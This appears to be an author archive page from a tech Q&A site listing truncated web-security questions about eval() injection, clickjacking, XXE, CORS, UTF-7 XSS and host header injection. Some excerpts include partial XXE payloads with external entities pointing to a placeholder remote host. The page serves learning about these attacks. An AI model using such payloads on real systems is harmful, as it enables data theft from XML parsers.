Utkarsh Agrawal – Page 4 – WindowsTechs.com

How eval() in php can be dangerous in web application’s security?

Posted on February 8, 2018 by Utkarsh Agrawal

I want to know that How eval function can be dangerous for any web application’s Security?

Below is the code I use to understand when any user input passes to the eval function, then How an attacker can exploit it?

<?ph… Continue reading How eval() in php can be dangerous in web application’s security?→

How to steal source code through clickjacking?

Posted on January 28, 2018 by Utkarsh Agrawal

Is it possible to steal the source code through clickjacking, so that attacker can also steal the CSRF tokens?

This is a demo attack website:

<!DOCTYPE html>
<html>

</div>
<div draggable=”true” ondrags… Continue reading How to steal source code through clickjacking?→

HTTPonly cookies are secure enough?

Posted on December 1, 2017 by Utkarsh Agrawal

I have a website which have a “remember me” functionality. And when someone clicks that functionality it sets the user password and username in the cookie to remember him/her. Okay, fine.

But, that cookie is on the HTTPonly … Continue reading HTTPonly cookies are secure enough?→

How to use Docker? [on hold]

Posted on September 24, 2017 by Utkarsh Agrawal

Hello i recently install the docker for XXE ctf, but i don’t know how i start, i also read the README file to started and i follow all those steps but didn’t succeed.

I am now sharing what i did and what i get?(onWINDOWS)

… Continue reading How to use Docker? [on hold]→

How to use Docker? [on hold]

Posted on September 24, 2017 by Utkarsh Agrawal

Hello i recently install the docker for XXE ctf, but i don’t know how i start, i also read the README file to started and i follow all those steps but didn’t succeed.

I am now sharing what i did and what i get?(onWINDOWS)

… Continue reading How to use Docker? [on hold]→

What are parameter entities in XML?

Posted on September 22, 2017 by Utkarsh Agrawal

What are parameter entities? How parameter entities works?

I have a example please let me know how this works.

<?xml version=”1.0″ encoding=”UTF-8″ ?>
<!DOCTYPE r
[ENTITY % name ‘<!ENTITY utkarsh SYSTEM “http… Continue reading What are parameter entities in XML?→

XXE exploitation [on hold]

Posted on September 21, 2017 by Utkarsh Agrawal

How does a XML parser work? When we submit our payload like the following:

?xml version=”1.0″ ?>

!DOCTYPE r [

!ELEMENT r ANY >

!ENTITY sp SYSTEM “http://x.x.x.x:443/test.txt”>
]>

r>&sp;/r>>

… Continue reading XXE exploitation [on hold]→

Why do we use CORS?

Posted on September 19, 2017 by Utkarsh Agrawal

I am confused about why websites use CORS. I know CORS provide some protocols through which website can call the resources from other domains, but is it possible to call the resource without CORS?

If it is, then what vulnerability can it … Continue reading Why do we use CORS?→

How to define the UTF-7 in firefox? [on hold]

Posted on August 28, 2017 by Utkarsh Agrawal

I want to define the utf-7 in firefox, to execute the UTF-7 xss payload.

So, how i can change it?

Is it related to the content-type header?

Continue reading How to define the UTF-7 in firefox? [on hold]→

Host header injection

Posted on August 4, 2017 by Utkarsh Agrawal

I am little bit confuse with that if the website using the CSRF token in the body of the request then “Is it possible to the host header injection?” By just manipulate the host header value.

So can anyone clarify me.

Thank… Continue reading Host header injection→